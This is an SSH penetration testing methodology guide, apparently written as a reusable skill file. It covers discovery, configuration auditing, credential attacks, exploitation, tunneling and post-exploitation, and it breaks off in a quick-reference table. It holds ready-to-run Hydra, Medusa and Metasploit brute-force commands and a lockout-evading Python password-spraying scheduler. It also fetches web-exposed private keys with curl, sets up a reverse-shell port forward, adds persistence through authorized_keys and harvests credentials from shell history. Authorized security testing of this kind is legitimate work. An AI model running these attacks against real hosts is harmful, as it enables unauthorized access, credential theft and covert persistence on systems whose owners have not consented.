# SSH Penetration Testing

## Purpose

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

## Prerequisites

### Required Tools

- Nmap with SSH scripts
- Hydra or Medusa for brute-forcing
- ssh-audit for configuration analysis
- Metasploit Framework
- Python with Paramiko library

### Required Knowledge

- SSH protocol fundamentals
- Public/private key authentication
- Port forwarding concepts
- Linux command-line proficiency

## Outputs and Deliverables

- **SSH Enumeration Report** - Versions, algorithms, configurations
- **Credential Assessment** - Weak passwords, default credentials
- **Vulnerability Assessment** - Known CVEs, misconfigurations
- **Tunnel Documentation** - Port forwarding configurations

## Core Workflow

### Phase 1: SSH Service Discovery

Identify SSH services on target networks:
```bash
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH (version detection is what identifies SSH on a non-standard port;
# without -sV the grep only matches ports nmap already labels "ssh" from its services table)
nmap -p- -sV --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100
```

### Phase 2: SSH Enumeration

Gather detailed information about SSH services:
```bash
# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods (a server that lists "password" for root is a
# direct brute-force target; "publickey" only means credential attacks are pointless)
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
```

### Phase 3: SSH Configuration Auditing

Identify weak configurations:
```bash
# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities (known CVEs matched on the banner version)
# - Hardening suggestions
```
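ssh2-enum-algos and ssh-audit both take their algorithm lists from the server's SSH_MSG_KEXINIT, the first binary packet a server sends after the banner exchange, so the audit can be reproduced with a few lines of Python. The script below is an added example, not code from the original page or from either tool: it parses the banner and the KEXINIT, flags the weak algorithms listed in this phase, and can probe a live host with `fetch_kexinit()`. The names `parse_banner`, `parse_kexinit`, `weak_algorithms` and `fetch_kexinit` are this example's own, and `SAMPLE_KEXINIT` is constructed in the block rather than captured from a real server.

```python
"""Parse an SSH server's banner and SSH_MSG_KEXINIT and flag weak algorithms.

Added example (not from the original page): the weak-algorithm names are the ones
listed under Phase 3 and SAMPLE_KEXINIT is constructed here, not captured."""
import socket
import struct

SSH_MSG_KEXINIT = 20
KEXINIT_FIELDS = ("kex", "hostkey", "cipher_c2s", "cipher_s2c", "mac_c2s", "mac_s2c",
                  "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")
WEAK = {                                   # the Phase 3 list
    "kex": {"diffie-hellman-group1-sha1"},
    "cipher": {"arcfour", "3des-cbc"},
    "mac": {"hmac-md5", "hmac-sha1-96"},
}


def parse_banner(line):
    """'SSH-2.0-OpenSSH_8.4p1 Debian-5' -> ('2.0', 'OpenSSH_8.4p1', 'Debian-5')."""
    if not line.startswith("SSH-"):
        raise ValueError("not an SSH identification string: %r" % line)
    ident, _, comment = line.strip().partition(" ")
    _, proto, software = ident.split("-", 2)
    return proto, software, comment or None


def protocol_findings(proto):
    """'1.99' means SSH-1 is offered alongside SSH-2; '1.x' means SSH-1 only."""
    return ["legacy SSH-1 protocol offered"] if proto.startswith("1.") else []


def _name_list(buf, off):
    """Read one RFC 4251 name-list: uint32 length, then comma-separated names."""
    (n,) = struct.unpack_from(">I", buf, off)
    names = buf[off + 4:off + 4 + n].decode("ascii")
    return [s for s in names.split(",") if s], off + 4 + n


def parse_kexinit(payload):
    """Decode an SSH_MSG_KEXINIT payload (RFC 4253 section 7.1) into {field: [names]}."""
    if payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("message type %d is not KEXINIT" % payload[0])
    off, lists = 1 + 16, {}                 # skip the message type and the 16-byte cookie
    for field in KEXINIT_FIELDS:
        lists[field], off = _name_list(payload, off)
    return lists                            # first_kex_packet_follows and reserved are ignored


def weak_algorithms(lists):
    """Sorted (category, name) pairs for every weak algorithm the server offers."""
    checks = (("kex", "kex"), ("cipher", "cipher_c2s"), ("cipher", "cipher_s2c"),
              ("mac", "mac_c2s"), ("mac", "mac_s2c"))
    found = {(cat, a) for cat, field in checks for a in lists[field] if a in WEAK[cat]}
    return sorted(found)


def fetch_kexinit(host, port=22, timeout=5):
    """Live probe: exchange banners, then read the server's first (still unencrypted) packet."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"SSH-2.0-kexprobe\r\n")
        f = sock.makefile("rb")
        line = f.readline().decode("ascii", "replace")
        while line and not line.startswith("SSH-"):      # servers may send text before the banner
            line = f.readline().decode("ascii", "replace")
        (packet_len,) = struct.unpack(">I", f.read(4))    # uint32 packet_length
        padding_len = f.read(1)[0]                        # byte padding_length
        payload = f.read(packet_len - padding_len - 1)    # payload, padding left unread
        return parse_banner(line), parse_kexinit(payload)


def build_kexinit(lists):
    """Encode {field: [names]} as a KEXINIT payload; used only to build the sample below."""
    body = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for field in KEXINIT_FIELDS:
        names = ",".join(lists.get(field, [])).encode("ascii")
        body += struct.pack(">I", len(names)) + names
    return body + b"\x00" + struct.pack(">I", 0)          # first_kex_packet_follows, reserved


# Constructed sample: a server still offering legacy algorithms next to modern ones.
SAMPLE_KEXINIT = build_kexinit({
    "kex": ["curve25519-sha256", "diffie-hellman-group1-sha1"],
    "hostkey": ["ssh-ed25519", "rsa-sha2-512"],
    "cipher_c2s": ["aes256-gcm@openssh.com", "3des-cbc"],
    "cipher_s2c": ["aes256-gcm@openssh.com", "3des-cbc"],
    "mac_c2s": ["hmac-sha2-256", "hmac-md5"],
    "mac_s2c": ["hmac-sha2-256", "hmac-md5"],
    "comp_c2s": ["none"], "comp_s2c": ["none"],
})

if __name__ == "__main__":
    for cat, name in weak_algorithms(parse_kexinit(SAMPLE_KEXINIT)):
        print("[!] weak %s: %s" % (cat, name))
```

A server that merely lists a weak algorithm is not necessarily using it: the client's preference order decides. The finding is still reportable because a man-in-the-middle can present a client that only offers the weak options, which is exactly the downgrade the hardening advice from ssh-audit is meant to close off.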
Key configuration weaknesses to identify:

- Weak key exchange algorithms (diffie-hellman-group1-sha1)
- Weak ciphers (arcfour, 3des-cbc)
- Weak MACs (hmac-md5, hmac-sha1-96)
- Deprecated protocol versions (SSH-1, advertised in the banner as `SSH-1.5` or, alongside SSH-2, as `SSH-1.99`)

### Phase 4: Credential Attacks

#### Brute-Force with Hydra
```bash
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate limiting evasion (slow): one task and a 5 s pause between connects.
# -W is the pause between connects per thread; lowercase -w is the response timeout.
hydra -l admin -P passwords.txt -t 1 -W 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success (first valid login/password pair found)
hydra -l admin -P passwords.txt -f ssh://192.168.1.100
```

#### Brute-Force with Medusa
```bash
# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
```

#### Password Spraying
```bash
# Test common password across users (single-quote the password so the shell
# does not treat "!" as history expansion)
hydra -L users.txt -p 'Summer2024!' ssh://192.168.1.100
```
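Hydra's `-L users.txt -p <password>` already sprays one password across every account, but it has no notion of a lockout budget: a second and third pass with new passwords can push accounts over a `pam_faillock` or `fail2ban` threshold. The scheduler below is an added example, not code from the original page. It keeps password-major order, tracks attempts per user in a sliding window so no account reaches the configured lockout count, and defers guesses instead of dropping them. The `attempt` callback is injectable so the logic runs without a network; `paramiko_attempt()` is the real one (Paramiko is imported lazily so the scheduler works without it). The function names, the 192.168.1.100 target and the user and password lists in the usage line are this example's own.

```python
"""Lockout-aware SSH password spraying scheduler.

Added example, not from the original page. One password is tried against every user
before the next password is used (password-major order), and a per-user sliding-window
budget keeps each account one guess short of a lockout threshold such as pam_faillock
deny=N. The attempt callback is injectable so the scheduler runs without a network;
paramiko_attempt() is the real one."""
import random
import time


def paramiko_attempt(host, port, user, password, timeout=5):
    """Return True on login, False on rejected credentials, None on a network error."""
    import paramiko                           # lazy import: the scheduler itself needs no Paramiko
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())   # accepts any host key
    try:
        client.connect(host, port=port, username=user, password=password, timeout=timeout,
                       allow_agent=False, look_for_keys=False)     # offer only the guessed password
        return True
    except paramiko.AuthenticationException:
        return False
    except Exception:
        return None
    finally:
        client.close()


def spray(host, users, passwords, attempt, port=22, threshold=5, window=900.0,
          delay=1.0, jitter=0.5, max_rounds=50, clock=time.monotonic, sleep=time.sleep):
    """Spray passwords over users; return {user: password} for every success.

    threshold: lockout count to stay under (at most threshold-1 guesses per user per
    window seconds). Guesses that would exceed it are deferred to a later round, as are
    attempts that failed with a network error. clock/sleep are injectable for testing."""
    if threshold < 2:
        raise ValueError("threshold must allow at least one guess per window")
    found, history = {}, {u: [] for u in users}
    pending = [(p, u) for p in passwords for u in users]       # password-major order
    rounds = 0
    while pending and rounds < max_rounds:
        rounds += 1
        deferred = []
        for password, user in pending:
            if user in found:
                continue
            now = clock()
            history[user] = [t for t in history[user] if now - t < window]
            if len(history[user]) >= threshold - 1:            # budget spent for this window
                deferred.append((password, user))
                continue
            history[user].append(now)
            result = attempt(host, port, user, password)
            if result is True:
                found[user] = password
            elif result is None:
                deferred.append((password, user))              # retry after a network error
            sleep(delay + random.uniform(0, jitter))
        if deferred and deferred == pending:                   # no progress: wait out the window
            sleep(window)
        pending = deferred
    return found


if __name__ == "__main__":
    hits = spray("192.168.1.100", ["admin", "deploy", "backup"],
                 ["Summer2024!", "Welcome1", "Password123"], paramiko_attempt)
    print(hits)
```

`threshold` and `window` have to come from the engagement (the customer's PAM or fail2ban settings, or a conservative guess); the scheduler cannot detect a lockout from the SSH side, because a locked account and a wrong password both come back as an authentication failure.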
```bash
# Multiple common passwords
for pass in 'Password123' 'Welcome1' 'Summer2024!'; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done
```

### Phase 5: Key-Based Authentication Testing

Test for weak or exposed keys:
```bash
# Attempt login with found private key (ssh refuses keys readable by others)
chmod 600 id_rsa
ssh -i id_rsa user@192.168.1.100

# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# Force password authentication
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@192.168.1.100

# Try common key names (BatchMode stops ssh from falling back to a password prompt
# when a key is rejected, so the loop does not hang)
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
    ssh -o BatchMode=yes -o IdentitiesOnly=yes -i "$key" user@192.168.1.100 true && echo "[+] $key works"
done
```

Check for exposed keys:
```bash
# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz
```

### Phase 6: Vulnerability Exploitation

Search for known vulnerabilities:
```bash
# Search for exploits
searchsploit openssh
searchsploit openssh 7.2
```

Common SSH vulnerabilities:

- CVE-2018-15473 - Username enumeration (OpenSSH up to 7.7: the server bails out of a malformed authentication request at a different point for valid and invalid usernames)
- CVE-2016-0777 - Roaming information leak in the OpenSSH client (OpenSSH 5.x to 7.1p1: a malicious server can read client memory, including private key material)
- CVE-2016-0778 - Buffer overflow in the same client roaming code

Note that the two roaming CVEs are client-side: they matter when the target runs SSH clients that connect to a server you control, not for attacking sshd directly.

```
# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
```

### Phase 7: SSH Tunneling and Port Forwarding

#### Local Port Forwarding

Forward local port to remote service:
```bash
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server
# (<remote_host> is resolved and reached from the SSH server's side)

# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
# Now access http://localhost:8080

# Access internal database
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100

# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100
```

#### Remote Port Forwarding

Expose local service to remote network:
```bash
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server

# Expose local web server to remote
ssh -R 8080:localhost:80 user@192.168.1.100
# Remote can access via localhost:8080 (on the SSH server itself: the listener binds
# to loopback there unless sshd has GatewayPorts enabled)

# Reverse shell callback
ssh -R 4444:localhost:4444 user@192.168.1.100
```

#### Dynamic Port Forwarding (SOCKS Proxy)

Create SOCKS proxy for network pivoting:
```bash
# Create SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.100

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
# SOCKS carries TCP only: use a connect scan (-sT) and skip ICMP host discovery (-Pn)
proxychains nmap -sT -Pn 192.168.1.0/24

# Browser configuration
# Set SOCKS proxy to localhost:1080
```
#### ProxyJump (Jump Hosts)

Chain through multiple SSH servers:

```bash
# Jump through intermediate host
ssh -J user1@jump_host user2@target_host

# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target
```

With SSH config (`~/.ssh/config`):

```
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump user@192.168.1.100
```

### Phase 8: Post-Exploitation

Activities after gaining SSH access:
```bash
# Check sudo privileges
sudo -l

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts      # hostnames may be hashed (HashKnownHosts); ~/.ssh/config and shell history still name them
cat ~/.ssh/authorized_keys

# Add persistence (add your key)
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys

# Extract SSH configuration
cat /etc/ssh/sshd_config
```
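Reading the extracted sshd_config by eye is error-prone in two specific ways: sshd uses the first value it sees for a keyword, so a hardening line further down is silently ignored, and anything below a `Match` line applies only to the users or addresses that line names. The auditor below is an added example, not code from the original page. It parses the file the way sshd does, flags the weak algorithms from Phase 3 together with `PermitRootLogin`, `PasswordAuthentication`, `PermitEmptyPasswords`, `Protocol 1` and a raised `MaxAuthTries`, applies sshd's first-wins rule and its defaults for absent keywords, and reports Match-scoped settings separately. `SAMPLE_SSHD_CONFIG` is constructed for illustration; the function names are this example's own, and `Include` directives are not followed.

```python
"""Audit an extracted sshd_config the way sshd reads it.

Added example, not from the original page. sshd uses the FIRST value it sees for a
keyword, keywords are case-insensitive, and anything below a Match line applies only
to the users/addresses that line names. SAMPLE_SSHD_CONFIG is constructed, and
Include directives are not followed."""
import re

WEAK_ALGOS = {                       # the Phase 3 list, keyed by sshd keyword
    "kexalgorithms": {"diffie-hellman-group1-sha1"},
    "ciphers": {"arcfour", "3des-cbc"},
    "macs": {"hmac-md5", "hmac-sha1-96"},
}
# Values sshd assumes when the keyword is absent (OpenSSH defaults).
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "permitemptypasswords": "no", "maxauthtries": "6"}


def parse_sshd_config(text):
    """Return [(scope, keyword, value)] in file order. scope is None for global lines
    or the Match criteria string ('User deploy') for lines inside that Match block."""
    entries, scope = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()                  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        keyword, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if keyword == "match":
            scope = value                                    # block runs until the next Match
            continue
        entries.append((scope, keyword, value))
    return entries


def check(keyword, value):
    """One finding string for a keyword/value pair, or None if it is not a problem."""
    v = value.lower()
    if keyword == "permitrootlogin" and v == "yes":
        return "PermitRootLogin yes: root is directly brute-forceable"
    if keyword == "passwordauthentication" and v == "yes":
        return "PasswordAuthentication yes: password guessing is possible"
    if keyword == "permitemptypasswords" and v == "yes":
        return "PermitEmptyPasswords yes"
    if keyword == "protocol" and "1" in v.split(","):
        return "Protocol 1 enabled (deprecated SSH-1)"
    if keyword == "maxauthtries" and v.isdigit() and int(v) > 6:
        return "MaxAuthTries %s: more guesses per connection than the default 6" % v
    if keyword in WEAK_ALGOS and not v.startswith("-"):     # '-list' only removes from defaults
        weak = [a for a in v.lstrip("+^").split(",") if a in WEAK_ALGOS[keyword]]
        if weak:
            return "%s offers weak algorithm(s): %s" % (keyword, ",".join(weak))
    return None


def audit(text):
    """Return [(scope, finding)]; scope is 'global', 'global (default)' or 'Match <criteria>'."""
    findings, first = [], {}
    for scope, keyword, value in parse_sshd_config(text):
        if scope is None:
            if keyword in first:                             # later duplicate: sshd ignores it
                findings.append(("global", "%s %s is ignored: earlier '%s' wins"
                                 % (keyword, value, first[keyword])))
                continue
            first[keyword] = value
        msg = check(keyword, value)
        if msg:
            findings.append(("global" if scope is None else "Match " + scope, msg))
    for keyword, default in DEFAULTS.items():               # absent keywords still have a value
        msg = None if keyword in first else check(keyword, default)
        if msg:
            findings.append(("global (default)", msg))
    return findings


# Constructed sample: looks hardened at a glance, is not.
SAMPLE_SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
Ciphers aes256-gcm@openssh.com,aes128-ctr,3des-cbc
MACs hmac-sha2-256,hmac-md5
KexAlgorithms -diffie-hellman-group1-sha1
MaxAuthTries 10
# the line below is ignored by sshd: the first PermitRootLogin wins
PermitRootLogin no
Match User deploy
    PasswordAuthentication yes
    PermitEmptyPasswords yes
"""

if __name__ == "__main__":
    for scope, finding in audit(SAMPLE_SSHD_CONFIG):
        print("[%s] %s" % (scope, finding))
```

The `-` prefix on an algorithm list (`KexAlgorithms -diffie-hellman-group1-sha1`) removes names from the compiled-in default rather than listing what is enabled, so the file alone cannot tell you the effective set; `sshd -T` on the host prints the resolved configuration and is the authoritative check when you have the access.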
```bash
# Find other users (accounts with a real login shell)
grep -vE 'nologin|false' /etc/passwd
ls /home/

# History for credentials
grep -i ssh ~/.bash_history
grep -i pass ~/.bash_history
```

### Phase 9: Custom SSH Scripts with Paramiko

Python-based SSH automation:
```python
#!/usr/bin/env python3
import sys

import paramiko


def ssh_connect(host, username, password):
    """Attempt SSH connection with credentials; returns a connected client or None"""
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts any host key, so a MITM cannot be detected; acceptable
    # for a test box, not for anything you will reuse
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # allow_agent/look_for_keys=False: offer only the guessed password, otherwise
        # local keys are tried first and burn the server's MaxAuthTries budget
        client.connect(host, username=username, password=password, timeout=5,
                       allow_agent=False, look_for_keys=False)
        print(f"[+] Success: {username}:{password}")
        return client
    except paramiko.AuthenticationException:
        print(f"[-] Failed: {username}:{password}")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


def execute_command(client, command):
    """Execute command via SSH and return (stdout, stderr)"""
    stdin, stdout, stderr = client.exec_command(command)
    output = stdout.read().decode(errors="replace")
    errors = stderr.read().decode(errors="replace")
    return output, errors


def ssh_brute_force(host, username, wordlist):
    """Brute-force SSH with wordlist; stops at the first working password"""
    with open(wordlist, "r", errors="replace") as f:
        passwords = f.read().splitlines()
    for password in passwords:
        client = ssh_connect(host, username, password.strip())
        if client:
            # Run post-exploitation commands
            output, _ = execute_command(client, "id; uname -a")
            print(output)
            client.close()
            return True
    return False


# Usage
if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
    user = "admin"

    # Single credential test
    client = ssh_connect(target, user, "password123")
    if client:
        output, _ = execute_command(client, "ls -la")
        print(output)
        client.close()
```

### Phase 10: Metasploit SSH Modules

Use Metasploit for comprehensive SSH testing:
```
# Start Metasploit
msfconsole

# SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# SSH Login Brute-Force (each valid credential opens a shell session)
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run

# SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
# Current Metasploit names this option KEY_PATH (a key file or a directory of keys);
# check with "show options" before setting it
set KEY_FILE /path/to/id_rsa
run

# Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run

# Post-exploitation with SSH session ("sessions -l" lists the sessions ssh_login opened)
sessions -i 1
```
## Quick Reference

### SSH Enumeration Commands

| Command | Purpose |
|---------|---------|
| `nc 192.168.1.100 22` | Banner grabbing |